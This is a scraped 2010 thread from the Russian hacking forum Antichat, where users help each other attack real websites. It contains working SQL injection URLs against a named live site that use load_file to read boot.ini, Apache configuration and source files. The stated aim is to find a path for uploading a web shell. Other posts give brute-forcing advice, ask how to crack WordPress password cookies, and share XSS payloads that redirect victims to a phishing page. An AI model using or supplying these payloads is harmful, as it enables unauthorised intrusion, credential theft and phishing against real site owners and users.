Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.03.2010, 20:41
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Всем привет
можно ли это как нибудь обойти?
PHP код:
$kat = htmlspecialchars($kat);
$kat = str_replace('.','',$kat);
$kat = str_replace('/','',$kat);
if ($_GET[file])
{
file("$kat/$file1");
}
 |
|
|
05.03.2010, 20:48
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,fi le_priv,3,4 ,5,6,7,8,9,10,11,12 +from+mysql.user
pojalusta pmoqite kak mojno zalivat shell ??
|
|
|
|
05.03.2010, 20:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Код:
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
искать абсолютные пути, брутить |
|
|
|
05.03.2010, 21:00
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Pashkela , izvini a kak i qde brutit ??
kak moqu uznat drugie puti ??
|
|
|
|
05.03.2010, 22:14
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
|
|
|
|
05.03.2010, 23:27
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
ServerName mission.am
DocumentRoot htdocs/mission
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
|
|
|
|
05.03.2010, 23:39
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от total90
есть строчка такого рода:
Код:
wordpress_test_cookie=WP+Cookie+check;%20wordpressuser_4660020b7a87d7619827cd8098d2d654=Spider;%20wordpresspass_4660020b7a87d7619827cd8098d2d654=febc22cb6c4923d9271a857fc9ea2f7d
как отсюда выдернуть кукисы или мд5 хеш пароля?мб онлайн дешифратор какой-то? судя по всему куки от wp <2.5, там пароль хранится в wordpresspass алгоритмом md5(md5())
|
|
|
|
06.03.2010, 06:19
|
|
Новичок
Регистрация: 25.07.2009
Сообщений: 10
Провел на форуме:
71531
Репутация:
0
|
|
У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом:
Код HTML:
style=background:url('//') onerror=document.write
Но это работает только в опере
Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк:
Код HTML:
onmouseover=document.write
Как сделать чтоб переадресация была автоматически в ie & firefox? |
|
|
|
06.03.2010, 07:30
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
Сообщение от Jokester
Паша, тебе лишь-бы логи засрать своей чудо программой.
Ну сколько-же тебя просить не учить людей всякой херне =\
LokbatanLi
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.use r
http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user
PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
|
|
|
|
06.03.2010, 10:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от LokbatanLi
net ne za defeysom sprasu..
prosto ne moqu nayti path shtobi shell zalivat ??
a dalse kto pomojet ??
Тебе ж дали путь.
На всякий случай почитай http://forum.antichat.ru/thread104591.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1956617){kind=avatar}
Похожие темы
Линейный вид
